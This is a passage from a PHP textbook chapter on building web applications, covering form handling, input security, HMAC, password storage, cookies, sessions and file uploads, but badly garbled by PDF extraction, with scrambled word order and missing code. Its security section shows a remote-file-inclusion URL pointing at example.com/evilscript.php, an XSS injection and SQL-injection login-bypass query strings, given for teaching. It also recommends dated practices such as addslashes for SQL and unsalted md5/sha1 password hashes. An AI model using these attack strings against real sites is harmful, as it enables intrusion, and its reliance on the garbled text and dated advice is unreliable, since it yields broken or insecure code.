elements of the form are defined by the input tags. The form high- lights (via the bold lines) three different types of input tags. The first type type='text' email . The name is needed to ( ) is a simple text field, with the name use the posted data in your PHP script that processes the form data. The name $_POST or $_GET array (for example, $_POST['email'] ). attribute is the key in the type='password' The second type of input tag ( ) is the same type as the text type, except that, for security reasons, all data the user types is displayed on- * screen as . This does not mean, of course, that the form collects the asterisks and sends them with the form. It just means that the text is displayed as type='submit' ) asterisks so no one can see the user’s password. The third type ( is rendered as a submit button that a user presses to actually submit the data entered into the form. The name of the submit button is the array key for the element where the value is stored (for example, $_POST['register'] equals 'Register' ) when the browser posts the form back to the web server. The full form as shown in a web browser looks similar to Figure 5.1.

144 Gutmans_ch05 Page 116 Thursday, September 23, 2004 2:41 PM 116 How to Write a Web Application with PHP Chap. 5 Full form as shown in a web browser. Fig. 5.1 attribute of the tag specifies the file to which the filled- The action . PHP makes available the data register.php in form is posted—in our case, from all the various form elements in the designated script. To process data, we need to change our form a little more. We only want the registration form to be shown if it is being displayed for the first time, not if it has already been filled in and submitted by a user. That is, we want to display the form only if the processing script didn’t receive any submitted data. We can tell whether the form has been submitted by a user by testing whether the submit button has been pressed. To do so, between the

Registration This line checks whether the 'register' $_POST array. key exists in the $_POST $_POST Because the array contains all fields from the posted form, the array will contain an element with the key register if the submit button has GET method, we would use the same test on the been pressed. If we use the array. Both arrays are superglobals, available in every function, without $_GET 'global' with the global keyword. After checking if the needing to be declared key exists in the array, we check if the value of the array element 'register' equals 'Register' , just to be sure.

145 Gutmans_ch05 Page 117 Thursday, September 23, 2004 2:41 PM 5.4 Safe-Handling User Input 117

and tag we add the following: Between the E-mail:
Name:
➥ Password:
This piece of code is executed if the form was filled out. As you can see, $_POST we simply echo all the form values by echoing the elements from the array. Dealing with user input data is not much harder than this, but... -H ANDLING U 5.4 S I NPUT AFE SER Trust nobody, especially not the users of your web application. Users always do unexpected things, whether on purpose or by accident, and thus might find bugs or security holes in your site. In the following sections, we first show some of the major problems that may cause your site to sustain attacks. Then, we talk about some techniques to deal with the problems. 5.4.1 Common Mistakes A certain set of mistakes are often made. If you read security-related mailing lists (such as Bugtraq, http://www.securityfocus.com/archive/1), you will notice at least a few vulnerabilities in PHP applications every week. 5.4.1.1 Global Variables One basic mistake is not initializing global vari- directive php.ini to Off (the 'register_globals' ables properly. Setting the default since PHP 4.2) protects against this mistake, but you still need to watch for the problem. Your application might be used by other users who set to On . Let’s illustrate what can happen if you don’t register_globals have initialize your variables with a basic example:

146 Gutmans_ch05 Page 118 Thursday, September 23, 2004 2:41 PM 118 How to Write a Web Application with PHP Chap. 5 } else { do_admin_task(); } ?> Although this looks like a simple thing, it can be overlooked in more com- plex scripts. In our example, not much harm is possible. The only thing that an attacker could do is use your web application with administrator rights. Far more severe problems can arise when you dynamically include files with the or functions in PHP. Consider the following (simplified) require() include() example: This script makes it possible for an attacker to execute arbitrary PHP code on your server, by simply appending ?module=http://example.com/evil- to the URL in the browser. When PHP receives this URL, it sets $module script include() equal to http://example.com/evilscript.php. When PHP executes the function, it tries to include the evilscript.php from example.com (which should not parse it, of course) and execute the PHP code in evilscript.php . might contain evilscript.php , code that would remove all files accessible by the web server. $_SESSION['admin'] or The first of these exploits can be solved by using setting to . The second can be solved setting the Off register_globals php.ini by checking whether the file exists on the local machine before including it, as in the following code: By using the 5.4.1.2 Cross-Site Scripting technique, cross-site scripting an attacker might be able to execute pieces of client-side scripting lan- guages, such as JavaScript, and steal cookies or other sensitive data. Cross- site scripting is really not hard. The attacker only needs a way to insert raw data into the HTML of the site. For example, the attacker might enter into an input box that does not strip any HTML tags. The following script illustrates this possibility: XSS example

147 Gutmans_ch05 Page 119 Thursday, September 23, 2004 2:41 PM 5.4 Safe-Handling User Input 119

'>
It’s a straightforward script. Suppose the attacker types the following into your form field: '>

148 Gutmans_ch05 Page 120 Thursday, September 23, 2004 2:41 PM 120 How to Write a Web Application with PHP Chap. 5 Voilà! Anyone can log in as any user, using a query string like http:// example.com/login.php?user=admin'%20OR%20(user='&pwd=') %20OR%20user=', which effectively calls the following statements: It’s even simpler with the URL http://example.com/login.php? user=admin'%23, which executes the query SELECT login_id FROM users WHERE user='admin'#' AND pwd='' . Note that the # marks the beginning of a comment in SQL. Again, it’s a simple attack. Fortunately, it’s also easy to prevent. You can addslashes() function that adds a slash before sanitize the input using the ), double quote ( " ), backslash ( \ every single quote ( \0 ). Other ' ), and NUL ( strip_tags() functions are available to sanitize input, such as . AFE M AKE S ECHNIQUES “S TO ” 5.5 T CRIPTS not trust There is only one solution to keeping your scripts running safe: Do users. Although this may sound harsh, it’s perfectly true. Not only might users “hack” your site, but they also do weird things by accident. It’s the program- mer’s responsibility to make sure that these inevitable errors can’t do serious damage. Thus, you need to deploy some techniques to save the user from insanity. 5.5.1 Input Validation input valida- One essential technique to protect your web site from users is tion , which is an impressive term that doesn’t mean much at all. The term simply means that you need to check all input that comes from the user, , or POST data. GET whether the data comes from cookies, First, turn off register_globals in php.ini and set the error_level to the E_ALL | E_STRICT ). The highest possible value ( setting stops register_globals the registration of request data ( , Session , GET , and POST variables) as glo- Cookie bal variables in your script; the high setting will enable notices for error_level uninitialized variables. For different kinds of input, you can use different methods. For instance, if you expect a parameter passed with the HTTP GET method to be an integer, force it to be an integer in your script:

149 Gutmans_ch05 Page 121 Thursday, September 23, 2004 2:41 PM 5.5 Techniques to Make Scripts “Safe” 121 Everything other than an integer value is converted to 0. But, what if doesn’t exist? You will receive a notice because we turned the $_GET['prod_id'] setting up. A better way to validate the input would be error_level However, if you have a large number of input variables, it can be tedious to write this code for each and every variable separately. Instead, you might want to create and use a function for this, as shown in the following example: $sig) { if (!isset($vars[$name]]) && isset($sig['required']) && $sig['required']) { /* redirect if the variable doesn't exist in the array */ if ($redir_url) { header("Location: $redir_url"); } else { echo 'Parameter $name not present and no redirect ➥ URL'; } exit(); } /* apply type to variable */ $tmp[$name] = $vars[$name]; if (isset($sig['type'])) { settype($tmp[$name], $sig['type']); }

150 Gutmans_ch05 Page 122 Thursday, September 23, 2004 2:41 PM 122 How to Write a Web Application with PHP Chap. 5 /* apply functions to the variables, you can use the standard ➥ PHP * functions, but also use your own for added flexibility. */ if (isset($sig['function'])) { $tmp[$name] = {$sig['function']}($tmp[$name]); } } $vars = $tmp; } $sigs = array( 'prod_id' => array('required' => true, 'type' => 'int'), 'desc' => array('required' => true, 'type' => 'string', 'function' => 'addslashes') ); sanitize_vars(&$_GET, $sigs, "http:// {$_SERVER['SERVER_NAME']}/error.php?cause=vars"); ?> 5.5.2 HMAC Verification If you need to prevent bad guys from tampering with variables passed in the URL (such as for a redirect as shown previously, or for links that pass special parameters to the linked script), you can use a hash, as shown in the following script: $value) { $data .= $key . $value; $ret[] = "$key=$value"; } /* We also add the md5sum of the $data as element * to the $ret array. */ $hash = md5($data); $ret[] = "hash=$hash"; return join ('&', $ret); }

151 Gutmans_ch05 Page 123 Thursday, September 23, 2004 2:41 PM 5.5 Techniques to Make Scripts “Safe” 123 echo 'err!'; ?> Running this script echoes the following link: err! ➥ However, this URL is still vulnerable. An attacker can modify both the variables and the hash. We must do something better. We’re not the first ones HMAC (Keyed-Hashing for with this problem, so there is an existing solution: Message Authentication). The HMAC method is proven to be stronger crypto- graphically, and should be used instead of home-cooked validation algorithms. The HMAC algorithm uses a secret key in a two-step hashing of plain text (in our case, the string containing the key/value pairs) with the following steps: 1. If the key length is smaller than 64 bytes (the block size that most hash- ing algorithms use), we pad the key to 64 bytes with s; if the key length \0 is larger than 64, we first use the hash function on the key and then pad it to 64 bytes with \0 s. (the 64- opad (the 64-byte key XORed with 0x5C) and ipad We construct 2. XOR ed with 0x36). byte key We create the “inner” hash by running the hash function with the para- 3. . (Because we use an “iterative” hash function, meter ipad . plain text or md5() , we don’t need to seed the hash function with our key like sha1() and then run the seeded hash function over our plain text. Internally, the hash will do the same anyway, which is the reason we padded the key up to 64 bytes). We create the “outer” hash by running the hash function over opad . 4. — that is, using the result obtained in step 3. inner_result Here is the formula to calculate HMAC, which should help you under- stand the calculation: H(K XOR opad, H(K XOR ipad, text)) With H . The hash function to use ☞ K . The key padded to 64 bytes with zeroes (0x0) ☞ ☞ opad . The 64 bytes of 0x5Cs

152 Gutmans_ch05 Page 124 Thursday, September 23, 2004 2:41 PM 124 How to Write a Web Application with PHP Chap. 5 ipad . The 64 bytes of 0x36s ☞ . The plain text for which we are calculating the hash text ☞ Great—so much for the boring theory. Now let’s see how we can use it with a PEAR class that was developed to calculate the hashes. 5.5.3 PEAR::Crypt_HMAC The Crypt_HMAC class implements the algorithm as described in RFC 2104 . Let’s look at it: pear install crypt_hmac and can be installed with class Crypt_HMAC { /** * Constructor * Pass method as first parameter * * @param string method - Hash function used for the calculation * @return void * @access public */ function Crypt_HMAC($key, $method = 'md5') { if (!in_array($method, array('sha1', 'md5'))) { die("Unsupported hash function '$method'."); } $this->_func = $method; /* Pad the key as the RFC wishes (step 1) */ if (strlen($key) > 64) { $key = pack('H32', $method($key)); } if (strlen($key) < 64) { $key = str_pad($key, 64, chr(0)); } /* Calculate the padded keys and save them (step 2 & 3) */ $this->_ipad = substr($key, 0, 64) ^ str_repeat(chr(0x36), ➥ 64); $this->_opad = substr($key, 0, 64) ^ str_repeat(chr(0x5C), 64); ➥ } First, we make sure that the requested underlying hash function is actu- ally supported (for now, only the built-in PHP functions md5() sha1() are and supported). Then, we create a key, according to steps 1 and 2, as previously

153 Gutmans_ch05 Page 125 Thursday, September 23, 2004 2:41 PM 5.5 Techniques to Make Scripts “Safe” 125 described. Finally, in the constructor, we pre-pad and XOR the key so that the hash() method can be used several times without losing performance by pad- ding the key every time a hash is requested: /** * Hashing function * * @param string data - string that will hashed (step 4) * @return string * @access public */ function hash($data) { $func = $this->_func; $inner = pack('H32', $func($this->_ipad . $data)); $digest = $func($this->_opad . $inner); return $digest; } } ?> In the hash function, we use the pre-padded key. First, we hash the inner result. Then, we hash the outer result, which is the digest (a different name for hash) that we return. Back to our original problem. We want to verify that no one tampered $_GET variables. Here is the second, more secure, version of with our precious our create_parameters() function: $value) { $data .= $key . $value; $ret[] = "$key=$value"; } $h = new Crypt_HMAC(SECRET_KEY, 'md5');

154 Gutmans_ch05 Page 126 Thursday, September 23, 2004 2:41 PM 126 How to Write a Web Application with PHP Chap. 5 $hash = $h->hash($data); $ret[] = "hash=$hash"; return join ('&', $ret); } echo 'err!'; ?> The output is ➥ err! To verify the parameters passed to the script, we can use this script: $value) { $data .= $key . $value; $ret[] = "$key=$value"; } $h = new Crypt_HMAC(SECRET_KEY, 'md5'); if ($hash != $h->hash($data)) { return FALSE; } else { return TRUE; } } /* We use a static array here, but in real life you would be using * $array = $_GET or similar. */

155 Gutmans_ch05 Page 127 Thursday, September 23, 2004 2:41 PM 5.5 Techniques to Make Scripts “Safe” 127 $array = array( 'cause' => 'vars', 'hash' => '6a0af635f1bbfb100297202ccd6dce53' ); if (!verify_parameters($array)) { die("Dweep! Somebody tampered with our parameters.\n"); } else { echo "Good guys, they didn't touch our stuff!!"; } ?> The SHA1 hash method gives you more cryptographic strength, but both MD5 and SHA1 are adequate enough for the purpose of checking the validity of your parameters. 5.5.4 Input Filter By using PHP 5, you can add hooks to process incoming data, but it’s mainly targeted at advanced developers with a sound knowledge of C and some knowledge of PHP internals. These hooks are called by the SAPI layer that treats the registering of the incoming data into PHP. One appliance might be to strip_tags() all incoming data automatically. Although all this can be done in user land with a function such as sanitize_vars() , this solution can only be enforced by writing a script that performs the desired processing and setting in php.ini to designate this script. Setting auto_prepend_file auto_prepend causes the processing script to be run at the beginning of every script. On the other hand, the server administrator can enforce a solution. For information on this, see http://www.derickrethans.nl/sqlite_filter.php for an implementa- tion of a filter that uses SQLite as an information source for filter rules. 5.5.5 Working with Passwords Another appliance of hash functions is authenticating a password entered in a form on your web site with a password stored in your database. For obvious reasons, you don’t want to store unencrypted passwords in your database. You want to prevent evil hackers who have access to your database (because the sysadmin blundered) from stealing passwords used by your clients. Because hash functions are not at all reversible, you can store the password hashed with a function like or sha1() md5() so the evil hackers can’t get the password in plain text. Auth class implements two methods— addUser() and The example —and makes use of the sha1() hashing function. The table scheme authUser() looks like this:

156 Gutmans_ch05 Page 128 Thursday, September 23, 2004 2:41 PM 128 How to Write a Web Application with PHP Chap. 5 CREATE TABLE users ( email VARCHAR(128) NOT NULL PRIMARY KEY, passwd CHAR(40) NOT NULL ); sha1() We use a length of 40 here, which is the same as the digest in hexadecimal characters: We didn’t use around the $email and $password variables addslashes() earlier. We will do that in the script that calls the methods of this class:

157 Gutmans_ch05 Page 129 Thursday, September 23, 2004 2:41 PM 5.5 Techniques to Make Scripts “Safe” 129 /* Define our parameters */ $sigs = array ( 'email' => array ('required' => TRUE, 'type' => 'string', 'function' => 'addslashes'), 'passwd' => array ('required' => TRUE, 'type' => 'string', 'function' => 'addslashes') ); /* Clean up our input */ sanitize_vars(&$_POST, $sigs); /* Instantiate the Auth class and add the user */ $a = new Auth(); $a->addUser($_POST['email'], $_POST['passwd']); /* or... we instantiate the Auth class and validate the user */ $a = new Auth(); echo $a->authUser($_POST['email'], $_POST['passwd']) ? 'OK' : 'ERROR'; ➥ ?> After the user is added to the database, something like this appears in your table: +--------+------------------------------------------+ | user | password | +--------+------------------------------------------+ | derick | 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 | +--------+------------------------------------------+ sha1() The first person who receives the correct password back from this hash can ask me for a crate of Kossu. 5.5.6 Error Handling During development, you probably want to code with error_reporting set to E_ALL & E_STRICT . Doing so helps you catch some bugs. If you have set to error_reporting , the executed script will show you E_ALL & E_STRICT errors like this: Warning: Call-time pass-by-reference has been deprecated - argument passed by value; If you would like to pass it by reference, modify the declaration of sanitize_vars(). If you would like to enable call-time pass-by-reference, you can set allow_call_time_pass_reference to true in your INI file. However, future versions may not support this any longer.

158 Gutmans_ch05 Page 130 Thursday, September 23, 2004 2:41 PM 130 How to Write a Web Application with PHP Chap. 5 $_POST in the call to sanitize with The reason for this is that we prefixed the reference operator, which is no longer supported. The correct line is: sanitize_vars($_POST, $sigs); However, you definitely do not want to see error messages like these on your production sites, especially not your cusomers. Not only is it unsightly, but some debuggers show the full parameters, including username and pass- word, which is information that should be kept private. PHP has features that make the experience much nicer for you, your customers, and visitors to the php.ini directives ' ' and ' display_errors ', you can con- log_errors site. With the directive to 1 , all errors log_errors trol where the errors appear. If you set the error_log are recorded in a file that you specify with the directive. You can set syslog to error_log or to a file name. In some cases, recording errors in a file (rather than displaying them to the user) may not make the experience nicer for the visitors. Instead, it may result in an empty or broken page. In such cases, you may want to tell visitors that something went wrong, or you may want to hide the problem from visi- tors. PHP supports a customized error handler that can be set with set_error_handler() . This function accepts one parameter that can be either a string containing the function name for the error-handling function or an array containing a classname/methodname combination. The error-handling function should be defined like error_function($type, $error, $file, $line) $type is the type of error that is caught and can be either , The E_NOTICE E_USER_NOTICE , , , or E_USER_ERROR . No additional errors E_WARNING E_USER_WARNING should be possible because the PHP code and the extensions are not supposed to emit other errors except parse errors or other low-level error messages. is the textual error message. $file $error $line are the file name and line and number on which the error occurred. By using the error handler, you can tell the user in a nice way that some- thing went wrong (for instance, in the layout of your site) or you can redirect the user to the main page (to hide the fact that something went wrong). The redirect, of course, will only work if no output was sent before the redirect, or output_buffering turned on. Note that a user-defined error handler if you have all errors, even if the error_reporting level tells PHP that not all captures errors should be shown.

159 Gutmans_ch05 Page 131 Thursday, September 23, 2004 2:41 PM 5.6 Cookies 131 OOKIES 5.6 C The simple registration we used earlier in this chapter does not make data persistent across requests. If you go to the next page (such as by clicking a link or by entering a different URL in your browser’s address bar), the posted data is gone. One simple way to maintain data between the different pages in a web application is with cookies. are sent by PHP through the web server Cookies setcookie() with the function and are stored in the browser. If a time-out is set for the cookie, the browser will even remember the cookie when you reset your computer; without the time-out set, the browser forgets the cookie as soon as the browser closes. You can also set a cookie to be valid only for a specific sub- domain, rather than having the cookie sent by the browser to the script when- ever the domain of the script is the same as the domain where the cookie was set (the default). In the next example, we set a cookie when a user has success- fully logged in with the login form: Login

Log-in

E-mail address:
Password:

160 Gutmans_ch05 Page 132 Thursday, September 23, 2004 2:41 PM 132 How to Write a Web Application with PHP Chap. 5 check_auth() function checks whether the username and password The match with the stored data and returns either the user id that belongs to the user or 0 when an error occurred. The setcookie('uid', $uid, time() + 14400, '/'); line tells the web server to add a cookie header to send to the browser. is the name of cookie to be set and has the value of the uid cookie. The $uid uid expression time() + 14400 sets the expiry time of the cookie to the current time plus 14,400 seconds, which is 4 hours. The time on the server must be correct function is the base for calculating the expiry time. Notice time() because the that the ob_start() turns on function is the first line of the script. ob_start() output buffering, which is needed to send cookies (or other headers) after you , the output to the browser would ob_start() output data. Without this call to line of the script, making it impossible to send any have started at the headers, and resulting in the following error when trying to add another or header() setcookie() ): header (with Instead of using output buffering (which is memory-intensive), you can, of course, change your script so that data is not output until after you set any headers. Cookies are sent by the script/web server to the browser. The browser is then responsible for sending the cookie, via HTTP request headers, to all suc- cessive pages that belong to your web application. With the third and fourth setcookie() function, you can control which sections of your parameters of the / web site receive the specific cookie headers. The third parameter is , which means that all pages in the domain (the root and all subdirectories) should receive the cookie data. The fourth parameter controls which domains receive the cookie header. For instance, if you use .example.com , the cookie is available to all subdomains of example.com. Or, you could use admin.example.com , restricting the cookies to the admin part of your application. In this case, we did not specify a domain, so all pages in the web application receive the cookie. After the line with the setcookie() call, a line issues a redirect header to the browser. This header requires the full path to the destination page. After the header line, we terminate the script with so that no headers can be exit() set from later parts of the code. The browser redirects to the given URL by requesting the new page and discarding the content of the current one. , the set_cookie() On any web page requested after the script that called cookie data is available in your script in a manner similar to the GET and POST data. The superglobal to read cookies is . The following index.php $_COOKIE script shows the use of cookies to authenticate a user. The first line of the page checks whether the cookie with the user id is set. If it’s set, we display our index.php page, echoing the user id set in the cookie. If it’s not set, we redirect to the login page:

161 Gutmans_ch05 Page 133 Thursday, September 23, 2004 2:41 PM 5.6 Cookies 133 Index page Logged in with UID:
Log out. Using this user id for important items, such as remembering authentica- tion data (as we do in this script), is not wise, because it’s easy to fake cookies. (For most browsers, it is enough to edit a simple text field.) A better solution— using PHP sessions—follows in a bit. Deleting a cookie is almost the same as setting one. To delete it, you use the same parameters that you used when you set the cookie, except for the value, which needs to be an empty string, and the expiry date, which needs to be set in the past. On our logout page, we delete the cookie this way: time() - 86400 is exactly one day ago, which is sufficiently in the The past for our browser to forget the cookie data. Figure 5.3 shows the way our scripts can be tied together. As previously mentioned, putting authentication data into cookies (as we did in the previous examples) is not secure because cookies are so easily faked. PHP has, of course, a better solution: sessions.

162 Gutmans_ch05 Page 134 Thursday, September 23, 2004 2:41 PM 134 How to Write a Web Application with PHP Chap. 5 index.php logout link clicked cookie ‘uid’ not set logout.php correct username/password redirect entered / cookie set redirect cookie unset login.php wrong username/password entered Scripts tied together. Fig. 5.3 5.7 S ESSIONS A PHP session allows an application to store information for the current “session,” which can be defined as one user being logged in to your application. A session is identified by a unique session ID. PHP creates a session ID that is an MD5 hash of the remote IP address, the current time, and some extra ran- domness represented in a hexadecimal string. This session ID can be passed in a cookie or added to all URLs to navigate your application. For security rea- sons, it’s better to force the user to have cookies enabled than to pass the ses- sion ID on the URL (which normally can be done manually by adding php.ini ) session.use_trans_sid ?PHP_SESSID= , or by turning on in where it might end up in web server’s logs as a HTTP_REFERER or be found by some evil person monitoring your traffic. That evil person can still see the ses- sion cookie data, of course, so you might want to use an SSL-enabled server to be really safe. But, to continue discussing sessions, we’re going to rewrite the previous cookie example using sessions. We create a file called session.inc that sets some session values, as shown in the following example, and include this file at the beginning of any script that is part of the session:

163 Gutmans_ch05 Page 135 Thursday, September 23, 2004 2:41 PM 5.7 Sessions 135 'session.use_cookies' is On the first line, the configuration parameter , which means that cookies will be used for propagation of the session 1 set to 1 'session.use_only_cookies' , which means ID. On the second line, is set to that a session ID passed in the URL to the script will be discarded. The second setting requires that users have cookies enabled to use sessions. If you cannot rely on people having cookies enabled, you can either remove this line, or you , which ensures that there is no global setting for this 0 can change the value to configuration parameter in php.ini or another place. You can configure the place where PHP will store session files with the Tip: session.save_path configuration setting. session_start() function must come after any session-related settings The ini_set() . Session_start() initializes the session module, setting are done with some headers (such as the session ID cookie and some caching-prevention head- ers), requiring its placement before any output has been sent to the browser. If no session ID is available at the time, is called, a new session ID session_start() $_SESSION array. Adding is created, and the session is initialized with an empty array is easy, as shown in the following example. This elements to the $_SESSION modified version of our login page shows the changed lines in bold: Login /* HTML form comes here */

164 Gutmans_ch05 Page 136 Thursday, September 23, 2004 2:41 PM 136 How to Write a Web Application with PHP Chap. 5 You can call session_name('NAME') session_start() in your Tip: before calling name of the session ID cookie. PHP_SESSID script to change the default session.inc file. Adding the session variable 'uid' to We first include our element of the $_SESSION superglo- the session is done easily by setting the uid $uid . Unsetting a session variable can be done with bal to the value of unset($_SESSION['uid']) . Tip: If you need to process a lot of data after modifying your session vari- , which is normally done ables, you might want to call session_write_close() automatically at the end of the script. This writes the session file to disk and unlocks the file from the operating system so that other scripts may use the session file. (You will notice that pages in a frame set might load serially if they use frames because the session file is locked by PHP.) The locking described here will not always work on NFS, so scripts in a Tip: frame set might still get the old non-updated session data. Avoid using NFS to store session files. Logging out is the same as destroying the session and its associated data, as we see in the logout script: , after which we We still need to initialize the session with session_start() superglobal to an empty array. Then, can clear the session by setting the $_SESSION we destroy the session and its associated data by calling session_destroy() . Session variables are accessed from the superglobal. Each ele- $_SESSION ment contains a session variable, using the session-variable name as key. In index.php if statement that checks whether a user is our script, we moved the session.inc file: logged in to a special function that we place in the function check_login() { if (!isset ($_SESSION['uid']) || !$_SESSION['uid']) { /* If no UID is in the cookie, we redirect to the login page */ header('Location: http://kossu/session/login.php'); } }

165 Gutmans_ch05 Page 137 Thursday, September 23, 2004 2:41 PM 5.8 File Uploads 137 'uid' session variable exists and In this function, we check whether the session variable is not 0 'uid' whether the value of the . If one of the checks fail, we redirect users to the login page; otherwise, we do nothing and let the calling function on every page check_login() script handle it from there. We call the session.inc where we require a user to be logged in. We need to make sure the file is included before any output is produced because it may need to send head- script: ers to the browser. Here is a snippet from the modified index.php Using sessions can be as simple as what’s shown here. Or, you can tweak some more parameters. Check out the file that accompanies the php.ini-dist PHP distributions. 5.8 F PLOADS ILE U We haven’t yet covered one type of input-uploading files. You can use the file upload feature of PHP to upload images or related materials, for example. POST with Because the browser needs to do a little bit more than just send a the relevant data, you need to use a specially crafted form for file uploads. Here is an example of such a special form: enctype="multipart/form-data" action="handle_img.php"

type="file" />
Send this file:
The differences between file upload forms and normal forms are bold in enctype attribute, included in the form tag, instructs the code listing. First, an the browser to send a different type of request. Actually, it’s a normal POST POST request, except the body containing the encoded files (and other form fields) is field=var&field2=var2 completely different. Instead of the simple syntax, something resembling a “text and HTML” email is sent in the body, with each form field. part being a file , which displays an input field The file upload field itself is the type and a browse button that allows a user to browse through the file system to find a file. The text on the browse button can’t be changed, so it is usually localized.

166 Gutmans_ch05 Page 138 Thursday, September 23, 2004 2:41 PM 138 How to Write a Web Application with PHP Chap. 5 (Mozilla in English uses “Browse,” IE in Dutch uses “Bladeren,” and so on.) The hidden input field sends a to the browser, setting the maximum MAX_FILE_SIZE allowable size of the file being uploaded. However, most browsers ignore this extra field, so it’s up to you in the handler script to accept or deny the file. 5.8.1 Handling the Incoming Uploaded File The array contains an array of information about each file that is $_FILES uploaded. The handler script can access the information using the name of the uploaded file as the key. The $_FILES['book_image'] variable contains the fol- lowing information for the uploaded file. Key Value Description name string(8) "p5pp.jpg" The original name of the file on the file system of the user who uploaded it. type string(10) "image/jpeg" The MIME type of the file. For a JPG image, this can be either image/jpeg or image/pjpeg and all other types have their dedicated MIME type. tmp_name string(14) "/tmp/phpyEXxWp" The temporary file name on the server’s file system. PHP will clean up after the request has finished, so you are required to do some- thing with it inside the script that handles the request (either delete or move it). int(0) error The error code. See the next paragraph for an explanation. size int(2045) The size in bytes of the uploaded file. A few possible errors can occur during a file upload. Most errors relate to the size of the uploaded file. Each error code has an associated constant. The following table shows the error conditions. Constant Description # UPLOAD_ERR_OK 0 The file was uploaded successfully and no errors occurred. UPLOAD_ERR_INI_SIZE 1 The size of the uploaded files exceeded the value of the php.ini . upload_max_file setting from UPLOAD_ERR_FORM_SIZE 2 The size of the uploaded files exceeded the value of the spe- cial form field . Because users can easily fake MAX_FILE_SIZE cannot the size, you rely on this one, and you always have to check the sizes yourself in the script by using $_FILES ['book_image']['size']; . UPLOAD_ERR_PARTIAL 3 There was a problem uploading the file because only a partial file was received. UPLOAD_ERR_NO_FILE 4 There was no file uploaded at all because the user did not select any in the upload form. This is not always an error; this field might not be required.

167 Gutmans_ch05 Page 139 Thursday, September 23, 2004 2:41 PM 5.8 File Uploads 139 After learning all this theory, we now examine the script that uploads a file. In this script, we check if the size is acceptable (we don’t want more than 50KB for the uploaded images) and if the uploaded file is of the correct type (we only want JPEG and PNG files). Of course, we also check the error codes shown in the previous table and use the correct way of moving it to our uploaded images directory:

168 Gutmans_ch05 Page 140 Thursday, September 23, 2004 2:41 PM 140 How to Write a Web Application with PHP Chap. 5 Perhaps somebody played tricks and didn’t use the form we provided. Thus, we need to check whether the posted form actually contains our not-false value. book_image field. The previous code sets the error message to a We check for this in later logic: } else { $book_image = $_FILES['book_image']; } /* We check for all possible error codes wemight get */ switch ($book_image['error']) { case UPLOAD_ERR_INI_SIZE: $err_msg = 'The size of the image is too large, '. "it can not be more than $max_photo_size bytes."; break 2; This error occurs when the uploaded file(s) exceed the configured php.ini setting upload_max_filesize and defaults to 2MB for the collected size of all uploaded files. Three other php.ini settings are important. One is , which controls the maximum allowed size of a POST request (it post_max_size file_uploads defaults to 8MB). The second is , which determines whether scripts on ). The last setting affect- may use remote file names or not at all (it defaults to , which specifies the temporary directory where ing file uploads is upload_tmp_dir files are uploaded (it defaults to on UNIX-like operating systems or the /tmp configured temporary directory on Windows). case UPLOAD_ERR_PARTIAL: $err_msg = 'An error ocurred while uploading the file, '. "please try again."; break 2; If the size of the uploaded file did not match the header’s advertised size, the problem can be caused by a network connection that suddenly broke. For example: case UPLOAD_ERR_NO_FILE: if ($upload_required) { $err_msg = 'You did not select a file to be uploaded, '. "please do so here."; break 2; } break 2;

169 Gutmans_ch05 Page 141 Thursday, September 23, 2004 2:41 PM 5.8 File Uploads 141 We only issue an error if we require a file to be uploaded. Remember that we set the Boolean variable true : $upload_required at the top of our script to case UPLOAD_ERR_FORM_SIZE: $err_msg = 'The size was too large according to '. 'the MAX_FILE_SIZE hidden field in the upload form.'; case UPLOAD_ERR_OK: if ($book_image['size'] > $max_photo_size) { $err_msg = 'The size of the image is too large, '. "it can not be more than $max_photo_size bytes."; } break 2; MAX_FILE_SIZE Because we cannot rely on the user-supplied , we always need to check for the size ourselves. UPLOAD_ERR_OK is similar, except that the image will not be available in the temporary directory if it was larger than the : MAX_FILE_SIZE default: $err_msg = "An unknown error occurred, ". "please try again here."; } We should never receive an unknown error, but it is good practice to build in a case for this. Also, if another error type is added in newer PHP versions, your script won’t break: /* Know we check for the mime type to be correct, we allow * JPEG and PNG images */ if (!in_array( $book_image['type'], array ('image/jpeg', 'image/pjpeg', 'image/png') )) { $err_msg = "You need to upload a PNG or JPEG image, ". "please do so here."; break; } With this code, we check whether to accept the file by looking at its MIME type. Note that some browsers might do things differently than others, so it’s good to test all browsers and see what MIME type they use for specific files. Tip: On http://www.webmaster-toolkit.com/mime-types.shtml, you can find an extensive list of MIME types.

170 Gutmans_ch05 Page 142 Thursday, September 23, 2004 2:41 PM 142 How to Write a Web Application with PHP Chap. 5 } while (0); /* If no error occurred we move the file to our upload directory */ if (!$err_msg) { if (!@move_uploaded_file( $book_image['tmp_name'], $upload_dir . $book_image['name'] )) { $err_msg = "Error moving the file to its destination, ". "please try again here."; } } ?> move_uploaded_file() to move the file to its We use the “special” function final destination. This function checks whether the file is really an uploaded file and whether the form was tricked into thinking the temporary file is something . The function other than the file we specified, such as /etc/passwd true if the file is an uploaded file or is_uploaded_file() if it is not. returns false Upload handler '/> We echo the error message in the body of the script in case there was an error uploading the file. (Remember that we initialized it to false at the top of the script.) In case the file upload succeeded, we construct an tag to display the uploaded image on our resulting page. If you want to add the width and height attributes to the tag, Tip: imagesize() function to do so. you can use the For more information about file uploading, see “The PHP Manual” at http://www.php.net/manual/en/features.file-upload.php.

171 Gutmans_ch05 Page 143 Thursday, September 23, 2004 2:41 PM 5.9 Architecture 143 5.9 A RCHITECTURE In this section, we discuss a few ways to organize the code in your web applica- tion. Although we cannot present you with every possible way of organizing code, we can at least discuss some of the most common ways. 5.9.1 One Script Serves All index.php , One script serves all stands for the idea that one script, usually handles all the requests for all different pages. Different content is passed as index.php script by adding URL parameters such as parameters to the index.php ?page=register . It is not wise to store all code in the script itself, but you can include the required code into the script. Figure 5.4 shows how it might work. u prod .php s ct Prod u ctC a tegory cont ct.php a Cont ct a a u bo t.php Abo u t index.php M a inp a ge Fig. 5.4 The “one script serves all” approach. ). about , contact , products As you can see, there is a case for every module ( In this application, a specific file and class can handle the request. You can imagine that, in case you have many different modules, the switch case will grow large, so it might be worthwhile to do it dynamically by loading a number of modules from a dedicated directory, like the following (pseudo code): foreach (directory in "modules/") { if file_exists("definition.php") { module_def = include "definition"; register_module(module_def);

